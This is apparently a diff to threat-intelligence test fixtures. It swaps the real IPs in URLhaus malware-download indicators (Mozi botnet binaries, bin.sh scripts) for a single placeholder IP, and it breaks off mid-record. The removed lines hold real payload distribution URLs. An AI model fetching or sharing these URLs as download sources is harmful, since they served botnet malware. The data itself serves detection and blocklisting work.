@@ -16403,18 +16403,18 @@ "url": { "path": "/Mozi.a", "extension": "a", - "original": "http://58.248.118.230:52650/Mozi.a", + "original": "http://89.160.20.156:52650/Mozi.a", "scheme": "http", "port": 52650, - "domain": "58.248.118.230", - "full": "http://58.248.118.230:52650/Mozi.a" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:52650/Mozi.a" }, - "ip": "58.248.118.230" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693765806Z", - "original": "{\"id\":\"961210\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961210/\",\"url\":\"http://58.248.118.230:52650/Mozi.a\",\"url_status\":\"online\",\"host\":\"58.248.118.230\",\"date_added\":\"2021-01-14 18:36:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.026923900Z", + "original": "{\"id\":\"961210\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961210/\",\"url\":\"http://89.160.20.156:52650/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:36:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -16452,18 +16452,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://219.155.30.125:59273/Mozi.m", + "original": "http://89.160.20.156:59273/Mozi.m", "scheme": "http", "port": 59273, - "domain": "219.155.30.125", - "full": "http://219.155.30.125:59273/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:59273/Mozi.m" }, - "ip": "219.155.30.125" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693769173Z", - "original": "{\"id\":\"961211\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961211/\",\"url\":\"http://219.155.30.125:59273/Mozi.m\",\"url_status\":\"online\",\"host\":\"219.155.30.125\",\"date_added\":\"2021-01-14 18:36:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.026930800Z", + "original": "{\"id\":\"961211\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961211/\",\"url\":\"http://89.160.20.156:59273/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:36:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -16501,18 +16501,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://121.159.74.78:40346/Mozi.m", + "original": "http://89.160.20.156:40346/Mozi.m", "scheme": "http", "port": 40346, - "domain": "121.159.74.78", - "full": "http://121.159.74.78:40346/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:40346/Mozi.m" }, - "ip": "121.159.74.78" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693772429Z", - "original": "{\"id\":\"961206\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961206/\",\"url\":\"http://121.159.74.78:40346/Mozi.m\",\"url_status\":\"online\",\"host\":\"121.159.74.78\",\"date_added\":\"2021-01-14 18:35:08 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.026937700Z", + "original": "{\"id\":\"961206\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961206/\",\"url\":\"http://89.160.20.156:40346/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:35:08 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -16550,18 +16550,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://179.227.77.63:44242/Mozi.m", + "original": "http://89.160.20.156:44242/Mozi.m", "scheme": "http", "port": 44242, - "domain": "179.227.77.63", - "full": "http://179.227.77.63:44242/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:44242/Mozi.m" }, - "ip": "179.227.77.63" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693775675Z", - "original": "{\"id\":\"961204\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961204/\",\"url\":\"http://179.227.77.63:44242/Mozi.m\",\"url_status\":\"offline\",\"host\":\"179.227.77.63\",\"date_added\":\"2021-01-14 18:35:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.026944700Z", + "original": "{\"id\":\"961204\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961204/\",\"url\":\"http://89.160.20.156:44242/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:35:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -16599,18 +16599,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://117.194.167.179:40624/Mozi.m", + "original": "http://89.160.20.156:40624/Mozi.m", "scheme": "http", "port": 40624, - "domain": "117.194.167.179", - "full": "http://117.194.167.179:40624/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:40624/Mozi.m" }, - "ip": "117.194.167.179" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693779202Z", - "original": "{\"id\":\"961205\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961205/\",\"url\":\"http://117.194.167.179:40624/Mozi.m\",\"url_status\":\"offline\",\"host\":\"117.194.167.179\",\"date_added\":\"2021-01-14 18:35:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.026951700Z", + "original": "{\"id\":\"961205\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961205/\",\"url\":\"http://89.160.20.156:40624/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:35:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -16648,18 +16648,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://123.9.103.67:41245/Mozi.m", + "original": "http://89.160.20.156:41245/Mozi.m", "scheme": "http", "port": 41245, - "domain": "123.9.103.67", - "full": "http://123.9.103.67:41245/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:41245/Mozi.m" }, - "ip": "123.9.103.67" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693782357Z", - "original": "{\"id\":\"961202\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961202/\",\"url\":\"http://123.9.103.67:41245/Mozi.m\",\"url_status\":\"online\",\"host\":\"123.9.103.67\",\"date_added\":\"2021-01-14 18:35:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.026958500Z", + "original": "{\"id\":\"961202\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961202/\",\"url\":\"http://89.160.20.156:41245/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:35:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -16697,18 +16697,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://182.116.67.218:48866/Mozi.m", + "original": "http://89.160.20.156:48866/Mozi.m", "scheme": "http", "port": 48866, - "domain": "182.116.67.218", - "full": "http://182.116.67.218:48866/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:48866/Mozi.m" }, - "ip": "182.116.67.218" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693785724Z", - "original": "{\"id\":\"961203\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961203/\",\"url\":\"http://182.116.67.218:48866/Mozi.m\",\"url_status\":\"online\",\"host\":\"182.116.67.218\",\"date_added\":\"2021-01-14 18:35:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.026965500Z", + "original": "{\"id\":\"961203\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961203/\",\"url\":\"http://89.160.20.156:48866/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:35:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -16746,18 +16746,18 @@
 "url": {
 "path": "/Mozi.m",
 "extension": "m",
- "original": "http://125.41.142.109:58258/Mozi.m",
+ "original": "http://89.160.20.156:58258/Mozi.m",
 "scheme": "http",
 "port": 58258,
- "domain": "125.41.142.109",
- "full": "http://125.41.142.109:58258/Mozi.m"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:58258/Mozi.m"
 },
- "ip": "125.41.142.109"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:08.693789090Z",
- "original": "{\"id\":\"961198\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961198/\",\"url\":\"http://125.41.142.109:58258/Mozi.m\",\"url_status\":\"online\",\"host\":\"125.41.142.109\",\"date_added\":\"2021-01-14 18:35:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.026972400Z",
+ "original": "{\"id\":\"961198\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961198/\",\"url\":\"http://89.160.20.156:58258/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:35:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -16795,18 +16795,18 @@
 "url": {
 "path": "/Mozi.m",
 "extension": "m",
- "original": "http://123.9.243.249:34516/Mozi.m",
+ "original": "http://89.160.20.156:34516/Mozi.m",
 "scheme": "http",
 "port": 34516,
- "domain": "123.9.243.249",
- "full": "http://123.9.243.249:34516/Mozi.m"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:34516/Mozi.m"
 },
- "ip": "123.9.243.249"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:08.693792687Z",
- "original": "{\"id\":\"961199\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961199/\",\"url\":\"http://123.9.243.249:34516/Mozi.m\",\"url_status\":\"online\",\"host\":\"123.9.243.249\",\"date_added\":\"2021-01-14 18:35:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.026979400Z",
+ "original": "{\"id\":\"961199\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961199/\",\"url\":\"http://89.160.20.156:34516/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:35:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -16844,18 +16844,18 @@
 "url": {
 "path": "/Mozi.m",
 "extension": "m",
- "original": "http://120.85.171.199:47851/Mozi.m",
+ "original": "http://89.160.20.156:47851/Mozi.m",
 "scheme": "http",
 "port": 47851,
- "domain": "120.85.171.199",
- "full": "http://120.85.171.199:47851/Mozi.m"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:47851/Mozi.m"
 },
- "ip": "120.85.171.199"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:08.693796795Z",
- "original": "{\"id\":\"961200\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961200/\",\"url\":\"http://120.85.171.199:47851/Mozi.m\",\"url_status\":\"online\",\"host\":\"120.85.171.199\",\"date_added\":\"2021-01-14 18:35:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.026986300Z",
+ "original": "{\"id\":\"961200\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961200/\",\"url\":\"http://89.160.20.156:47851/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:35:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -16893,18 +16893,18 @@
 "url": {
 "path": "/Mozi.m",
 "extension": "m",
- "original": "http://186.33.122.79:49226/Mozi.m",
+ "original": "http://89.160.20.156:49226/Mozi.m",
 "scheme": "http",
 "port": 49226,
- "domain": "186.33.122.79",
- "full": "http://186.33.122.79:49226/Mozi.m"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:49226/Mozi.m"
 },
- "ip": "186.33.122.79"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:08.693800702Z",
- "original": "{\"id\":\"961201\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961201/\",\"url\":\"http://186.33.122.79:49226/Mozi.m\",\"url_status\":\"online\",\"host\":\"186.33.122.79\",\"date_added\":\"2021-01-14 18:35:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.026993200Z",
+ "original": "{\"id\":\"961201\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961201/\",\"url\":\"http://89.160.20.156:49226/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:35:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -16943,18 +16943,18 @@
 "url": {
 "path": "/bin.sh",
 "extension": "sh",
- "original": "http://103.97.139.251:36957/bin.sh",
+ "original": "http://89.160.20.156:36957/bin.sh",
 "scheme": "http",
 "port": 36957,
- "domain": "103.97.139.251",
- "full": "http://103.97.139.251:36957/bin.sh"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:36957/bin.sh"
 },
- "ip": "103.97.139.251"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:08.693804088Z",
- "original": "{\"id\":\"961197\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961197/\",\"url\":\"http://103.97.139.251:36957/bin.sh\",\"url_status\":\"online\",\"host\":\"103.97.139.251\",\"date_added\":\"2021-01-14 18:34:10 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"elf\",\"mips\"]}",
+ "ingested": "2021-12-13T08:40:08.027000300Z",
+ "original": "{\"id\":\"961197\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961197/\",\"url\":\"http://89.160.20.156:36957/bin.sh\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:34:10 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"elf\",\"mips\"]}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -16992,18 +16992,18 @@
 "url": {
 "path": "/Mozi.m",
 "extension": "m",
- "original": "http://115.54.114.20:53089/Mozi.m",
+ "original": "http://89.160.20.156:53089/Mozi.m",
 "scheme": "http",
 "port": 53089,
- "domain": "115.54.114.20",
- "full": "http://115.54.114.20:53089/Mozi.m"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:53089/Mozi.m"
 },
- "ip": "115.54.114.20"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:08.693807445Z",
- "original": "{\"id\":\"961196\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961196/\",\"url\":\"http://115.54.114.20:53089/Mozi.m\",\"url_status\":\"online\",\"host\":\"115.54.114.20\",\"date_added\":\"2021-01-14 18:34:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.027007200Z",
+ "original": "{\"id\":\"961196\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961196/\",\"url\":\"http://89.160.20.156:53089/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:34:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -17041,18 +17041,18 @@
 "url": {
 "path": "/Mozi.m",
 "extension": "m",
- "original": "http://103.161.49.76:57114/Mozi.m",
+ "original": "http://89.160.20.156:57114/Mozi.m",
 "scheme": "http",
 "port": 57114,
- "domain": "103.161.49.76",
- "full": "http://103.161.49.76:57114/Mozi.m"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:57114/Mozi.m"
 },
- "ip": "103.161.49.76"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:08.693811302Z",
- "original": "{\"id\":\"961193\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961193/\",\"url\":\"http://103.161.49.76:57114/Mozi.m\",\"url_status\":\"online\",\"host\":\"103.161.49.76\",\"date_added\":\"2021-01-14 18:34:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.027014100Z",
+ "original": "{\"id\":\"961193\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961193/\",\"url\":\"http://89.160.20.156:57114/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:34:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -17090,18 +17090,18 @@
 "url": {
 "path": "/Mozi.a",
 "extension": "a",
- "original": "http://115.56.159.83:33163/Mozi.a",
+ "original": "http://89.160.20.156:33163/Mozi.a",
 "scheme": "http",
 "port": 33163,
- "domain": "115.56.159.83",
- "full": "http://115.56.159.83:33163/Mozi.a"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:33163/Mozi.a"
 },
- "ip": "115.56.159.83"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:08.693814518Z",
- "original": "{\"id\":\"961194\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961194/\",\"url\":\"http://115.56.159.83:33163/Mozi.a\",\"url_status\":\"online\",\"host\":\"115.56.159.83\",\"date_added\":\"2021-01-14 18:34:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.027021200Z",
+ "original": "{\"id\":\"961194\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961194/\",\"url\":\"http://89.160.20.156:33163/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:34:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -17139,18 +17139,18 @@
 "url": {
 "path": "/Mozi.m",
 "extension": "m",
- "original": "http://115.56.181.246:48557/Mozi.m",
+ "original": "http://89.160.20.156:48557/Mozi.m",
 "scheme": "http",
 "port": 48557,
- "domain": "115.56.181.246",
- "full": "http://115.56.181.246:48557/Mozi.m"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:48557/Mozi.m"
 },
- "ip": "115.56.181.246"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:08.693818285Z",
- "original": "{\"id\":\"961195\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961195/\",\"url\":\"http://115.56.181.246:48557/Mozi.m\",\"url_status\":\"online\",\"host\":\"115.56.181.246\",\"date_added\":\"2021-01-14 18:34:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.027028100Z",
+ "original": "{\"id\":\"961195\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961195/\",\"url\":\"http://89.160.20.156:48557/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:34:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -17189,18 +17189,18 @@
 "url": {
 "path": "/bin.sh",
 "extension": "sh",
- "original": "http://115.58.166.75:59976/bin.sh",
+ "original": "http://89.160.20.156:59976/bin.sh",
 "scheme": "http",
 "port": 59976,
- "domain": "115.58.166.75",
- "full": "http://115.58.166.75:59976/bin.sh"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:59976/bin.sh"
 },
- "ip": "115.58.166.75"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:08.693821621Z",
- "original": "{\"id\":\"961192\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961192/\",\"url\":\"http://115.58.166.75:59976/bin.sh\",\"url_status\":\"online\",\"host\":\"115.58.166.75\",\"date_added\":\"2021-01-14 18:31:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"arm\",\"elf\"]}",
+ "ingested": "2021-12-13T08:40:08.027069900Z",
+ "original": "{\"id\":\"961192\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961192/\",\"url\":\"http://89.160.20.156:59976/bin.sh\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:31:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"arm\",\"elf\"]}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -17238,18 +17238,18 @@
 "provider": "geenensp",
 "url": {
 "path": "/i",
- "original": "http://125.44.61.35:48291/i",
+ "original": "http://89.160.20.156:48291/i",
 "scheme": "http",
 "port": 48291,
- "domain": "125.44.61.35",
- "full": "http://125.44.61.35:48291/i"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:48291/i"
 },
- "ip": "125.44.61.35"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:08.693824727Z",
- "original": "{\"id\":\"961191\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961191/\",\"url\":\"http://125.44.61.35:48291/i\",\"url_status\":\"online\",\"host\":\"125.44.61.35\",\"date_added\":\"2021-01-14 18:22:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"arm\",\"elf\"]}",
+ "ingested": "2021-12-13T08:40:08.027077900Z",
+ "original": "{\"id\":\"961191\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961191/\",\"url\":\"http://89.160.20.156:48291/i\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:22:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"arm\",\"elf\"]}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -17287,18 +17287,18 @@
 "url": {
 "path": "/Mozi.m",
 "extension": "m",
- "original": "http://42.230.84.239:45797/Mozi.m",
+ "original": "http://89.160.20.156:45797/Mozi.m",
 "scheme": "http",
 "port": 45797,
- "domain": "42.230.84.239",
- "full": "http://42.230.84.239:45797/Mozi.m"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:45797/Mozi.m"
 },
- "ip": "42.230.84.239"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
